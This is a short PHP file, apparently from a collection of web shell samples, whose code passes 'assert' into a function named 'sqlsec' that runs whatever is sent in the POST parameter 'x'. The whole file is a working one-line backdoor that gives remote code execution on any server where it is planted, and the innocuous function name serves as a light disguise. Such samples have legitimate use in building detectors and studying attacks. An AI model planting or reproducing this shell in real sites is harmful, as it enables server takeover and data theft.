webshell/php/2020.08.20.05.php

7 lines
87 B
PHP

<?php
function sqlsec($a){
$a($_POST['x']);
}
sqlsec(assert);
?>